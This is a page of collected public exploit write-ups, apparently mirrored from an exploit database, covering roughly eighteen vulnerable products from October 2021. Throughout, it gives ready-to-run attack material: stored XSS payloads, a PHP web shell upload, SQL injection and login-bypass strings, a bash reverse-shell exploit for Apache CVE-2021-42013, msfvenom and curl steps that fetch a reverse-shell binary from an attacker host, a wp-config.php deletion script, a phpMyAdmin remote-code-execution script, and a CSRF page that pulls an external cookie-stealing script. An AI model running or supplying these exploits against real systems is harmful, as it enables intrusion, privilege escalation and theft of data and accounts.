ISHACK AI BOT

# Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 23-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: # Software Link: https://wordpress.org/plugins/simple-tags/ # Tested on Windows # CVE: CVE-2021-24444 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444 # Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate TaxoPress Version 3.0.7.1 3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions' and enter the data into the user input field. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

# Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path # Exploit Author: Mert DAŞ # Version: 2.4.64 # Date: 23.10.2021 # Vendor Homepage: https://www.netgear.com/ # Tested on: Windows 10 C:\Users\Mert>sc qc NETGEARGenieDaemon [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NETGEARGenieDaemon TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NETGEARGenieDaemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem Or: ------------------------- C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) # Date: 10/23/2021 # Exploit Author: SadKris # Venor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Version: 1.0 # Tested on: XAMPP, Windows 11 # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /EngineerShit/teacher_avatar.php HTTP/1.1 Host: localhost.me Content-Length: 510 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost.me Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost.me/EngineerShit/dasboard_teacher.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="image"; filename="vuln.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="change" # Response HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:51:19 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 <script> window.location = "dasboard_teacher.php"; </script> # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1 Host: localhost.me Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:54:07 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 154 Connection: close Content-Type: text/html; charset=UTF-8 <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> gottem bois

# Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated) # Date: 24/10/2021 # Exploit Author: Nehru Sethuraman # Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart # Version: 21.0817 # Build: 3 # Google Dorks: intitle:buildsmart accounting # Tested on: OS - Windows 2012 R2 or 8.1 & Database - Microsoft SQL Server 2014 Exploit Details: URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl= *HTTP Method:* POST *POST DATA:* VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail= Vulnerable Parameter: eidValue SQL Injection Type: Stacked queries Payload: ';WAITFOR DELAY '0:0:3'--

# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) # Credits: Ash Daulton & cPanel Security Team # Date: 24/07/2021 # Exploit Author: TheLastVvV.com # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.50 with CGI enable # Tested on : Debian 5.10.28 # CVE : CVE-2021-42013 #!/bin/bash echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' if [ $# -eq 0 ] then echo "try: ./$0 http://ip:port LHOST LPORT" exit 1 fi curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh" #usage chmod -x CVE-2021-42013.sh #./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated) # Date: 24.10.2021 # Exploit Author: blockomat2100 # Vendor Homepage: https://www.balbooa.com/ # Version: 2.0.6 # Tested on: Docker An example request to trigger the SQL-Injection: POST /index.php?option=com_baforms HTTP/1.1 Host: localhost Content-Length: 862 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035 Connection: close ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="1" {"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}} ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="form-id" 1 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="task" form.message ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="submit-btn" 2 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-title" Home ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-url" http://localhost/ ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-id" 0 ------WebKitFormBoundaryTAak6w3vHUykgInT--

# Exploit Title: OpenClinic GA 5.194.18 - Local Privilege Escalation # Date: 2021-07-24 # Author: Alessandro Salzano # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/files/latest/download # Version: 5.194.18 # Tested on: Microsoft Windows 10 Enterprise x64 Open Source Integrated Hospital Information Management System. OpenClinic GA is an open source integrated hospital information management system covering management of administrative, financial, clinical, lab, x-ray, pharmacy, meals distribution and other data. Extensive statistical and reporting capabilities. Vendor: OpenClinic GA. Affected version: > 5.194.18 # Details # By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below. # A low privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also have unquoted service path issues. (1) Impacted services. Any low privileged user can elevate their privileges abusing MariaDB service: C:\projects\openclinic\mariadb\bin\mysqld.exe Details: SERVICE_NAME: OpenClinicHttp TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\tomcat8\bin\tomcat8.exe //RS//OpenClinicHttp LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicHttp DEPENDENCIES : Tcpip : Afd SERVICE_START_NAME : NT Authority\LocalServic -------- SERVICE_NAME: OpenClinicMySQL TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicMySQL DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: icacls C:\projects\openclinic C:\projects\openclinic Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system

# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation # Date: 2021-07-19 # Author: Alessandro 'mindsflee' Salzano # Vendor Homepage: https://www.gestionaleopen.org/ # Software Homepage: https://www.gestionaleopen.org/ # Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe # Version: 11.00.00 # Tested on: Microsoft Windows 10 Enterprise x64 With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation. Vendor: Gestionale Open srl. Affected version: > 11.00.00 # Details # By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below. # A low privilege account is able to rename the mysqld.exe file located in bin folder and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also have unquoted service path issues. (1) Impacted services. Any low privileged user can elevate their privileges abusing MariaDB service: C:\Gestionale_Open\MySQL57\bin\mysqld.exe Details: SERVICE_NAME: DB_GO TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DB_GO DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: C:\Gestionale_Open Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system

# Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip # Version: 1.0 # Tested on: Linux # Vulnerable page: HOLY # Vulnerable Parameters: "reason" Technical description: A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/event-management/views/?v=HOLY 2) Insert your payload in the "reason" parameter 3) Click "Add holiday" Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert("This is an XSS")</script> --- POST /event-management/api/process.php?cmd=holiday HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 81 Origin: http://localhost Connection: close Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted. Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E ---

# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # CVE : cve-2021-42664 # Vulnerable page: add_quiz.php # Vulnerable Parameters: "quiz_title", "description" Technical description: A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php 2) Insert your payload in the "quiz_title" parameter or the "description" parameter 3) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert("This is an XSS Give me your cookies")</script> --- POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save= OR POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6 Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save= ---

# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: login.php # VUlnerable parameters: "username", "password" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - ' OR '1'='1';-- - --- POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 41 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username='+or+'1'%3D'1'%3B--+-&password=sqli OR POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 44 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username=sqli&password='+or+'1'%3D'1'%3B--+- ---

# Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: quiz_question.php # Vulnerable Parameter: "id" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php 2) Insert your payload in the id parameter Proof of concept (Poc): The following payload will allow you to extract the MySql server version running on the web server - ' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- - --- GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 ---

# Exploit Title: WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/media-tags/ # Software Link: www.codehooligans.com/projects/wordpress/media-tags/ # Version: 3.2.0.2 # Tested on Windows *How to reproduce vulnerability:* 1. Install Latest WordPress 2. Install and activate Media-Tags <= 3.2.0.2 3. Navigate to Add Table >> add the payload into 'Media Tag Label Fields' and enter the data into the user input field. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

# Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/ninja-tables/ # Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/ # Version: 4.1.7 # Tested on Windows *How to reproduce vulnerability:* 1. Install Latest WordPress 2. Install and activate Ninja Tables <= 4.1.7 3. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data' and enter the data into the user input field.Then Navigate to Table Design 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

# Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2) # Date: 04/08/2021 # Exploit Author: samguy # Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz # Version: 4.9.6 # Tested on: Linux - Debian Buster (PHP 7.3) # Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution # EDB : EDB-44949 # CVE : CVE-2018-12895 /* Usage: 1. Login to wordpress with privileges of an author 2. Navigates to Media > Add New > Select Files > Open/Upload 3. Click Edit > Open Developer Console > Paste this exploit script 4. Execute the function, eg: unlink_thumb("../../../../wp-config.php") */ function unlink_thumb(thumb) { $nonce_id = document.getElementById("_wpnonce").value if (thumb == null) { console.log("specify a file to delete") return false } if ($nonce_id == null) { console.log("the nonce id is not found") return false } fetch(window.location.href.replace("&action=edit",""), { method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb }) .then(function(resp0) { if (resp0.redirected) { $del = document.getElementsByClassName("submitdelete deletion").item(0).href if ($del == null) { console.log("Unknown error: could not find the url action") return false } fetch($del, { method: 'GET', credentials: 'include' }).then(function(resp1) { if (resp1.redirected) { console.log("Arbitrary file deletion of " + thumb + " succeed!") return true } else { console.log("Arbitrary file deletion of " + thumb + " failed!") return false } }) } else { console.log("Arbitrary file deletion of " + thumb + " failed!") return false } }) }

# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE) # Date: 17/08/2021 # Exploit Author: samguy # Vulnerability Discovery By: ChaMd5 & Henry Huang # Vendor Homepage: http://www.phpmyadmin.net # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz # Version: 4.8.1 # Tested on: Linux - Debian Buster (PHP 7.3) # CVE : CVE-2018-12613 #!/usr/bin/env python import re, requests, sys # check python major version if sys.version_info.major == 3: import html else: from six.moves.html_parser import HTMLParser html = HTMLParser() if len(sys.argv) < 7: usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command] Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami""" print(usage.format(sys.argv[0],sys.argv[0])) exit() def get_token(content): s = re.search('token"\s*value="(.*?)"', content) token = html.unescape(s.group(1)) return token ipaddr = sys.argv[1] port = sys.argv[2] path = sys.argv[3] username = sys.argv[4] password = sys.argv[5] command = sys.argv[6] url = "http://{}:{}{}".format(ipaddr,port,path) # 1st req: check login page and version url1 = url + "/index.php" r = requests.get(url1) content = r.content.decode('utf-8') if r.status_code != 200: print("Unable to find the version") exit() s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content) version = s.group(1) if version != "4.8.0" and version != "4.8.1": print("The target is not exploitable".format(version)) exit() # get 1st token and cookie cookies = r.cookies token = get_token(content) # 2nd req: login p = {'token': token, 'pma_username': username, 'pma_password': password} r = requests.post(url1, cookies = cookies, data = p) content = r.content.decode('utf-8') s = re.search('logged_in:(\w+),', content) logged_in = s.group(1) if logged_in == "false": print("Authentication failed") exit() # get 2nd token and cookie cookies = r.cookies token = get_token(content) # 3rd req: execute query url2 = url + "/import.php" # payload payload = '''select '<?php system("{}") ?>';'''.format(command) p = {'table':'', 'token': token, 'sql_query': payload } r = requests.post(url2, cookies = cookies, data = p) if r.status_code != 200: print("Query failed") exit() # 4th req: execute payload session_id = cookies.get_dict()['phpMyAdmin'] url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id) r = requests.get(url3, cookies = cookies) if r.status_code != 200: print("Exploit failed") exit() # get result content = r.content.decode('utf-8', errors="replace") s = re.search("select '(.*?)\n'", content, re.DOTALL) if s != None: print(s.group(1))

# Exploit Title: WordPress Plugin Filterable Portfolio Gallery 1.0 - 'title' Stored Cross-Site Scripting (XSS) # Date: 10/25/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: http://www.filterable-portfolio.com/ # Software Link: https://wordpress.org/plugins/fg-gallery/ # Version: 1.0 # Tested on : Windows 10 #Poc: 1. Install Latest WordPress 2. Install and activate Filterable Portfolio Gallery 1.0 3. Open plugin on the left frame and enter JavaScript payload which is mentioned below into 'title' field, save and preview. <img src=x onerror=alert(1)> 4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen.

# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) # Date: 10/27/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://supsystic.com/ # Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/ # Version: 1.7.18 # Tested on : Windows 10 #Poc: 1. Install Latest WordPress 2. Install and activate plugin. 3. Open plugin, click "Add New Form" and select any form. 4. Click "Fields" tab and "Add New Field". Choose whatever you want. 5. Inject JavaScript payload which is mentioned below into 'label' field, save and alert will appear on the screen. Payload : <img src=x onerror=alert(1)>

# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) # Date: 2021-10-27 # Exploit Author: Anubhav Singh # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hostel-management-system/ # Version: V 2.1 # Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php # Tested on Windows 10, XAMPP Steps to reproduce: 1) Navigate to http://localhost/hostel/hostel/my-profile.php 2) Enter xss payload "><script src=https://anubhav1403.xss.ht></script> in name field 3) Click on Update Profile and intercept the request in Burpsuite 4) Generate a CSRF POC of Update Profile ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/hostel/hostel/my-profile.php" method="POST"> <input type="hidden" name="regno" value="123456" /> <input type="hidden" name="fname" value=""><script&#32;src&#61;https&#58;&#47;&#47;anubhav1403&#46;xss&#46;ht><&#47;script>" /> <input type="hidden" name="mname" value="Hello" /> <input type="hidden" name="lname" value="Singh" /> <input type="hidden" name="gender" value="male" /> <input type="hidden" name="contact" value="12345678995" /> <input type="hidden" name="email" value="anubhav&#64;gmail&#46;com" /> <input type="hidden" name="update" value="Update&#32;Profile" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` 5) Send this POC to victim 6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires. 7) Now attacker get's the details of victim like ip address, cookies of Victim, etc 8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!! #POC https://ibb.co/jVcZxnt https://ibb.co/DwGh4x9

